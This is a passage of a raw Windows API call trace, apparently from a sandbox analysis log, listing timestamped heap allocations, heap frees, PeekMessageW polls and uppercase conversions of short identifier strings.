(in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0196.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.868] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0196.868] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0196.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.868] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0196.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.869] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.869] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.869] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.869] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.869] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.869] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.870] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.870] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0196.872] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.872] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.872] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.872] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.872] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.873] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.873] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.873] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.873] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.874] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.876] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.876] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.876] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.876] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 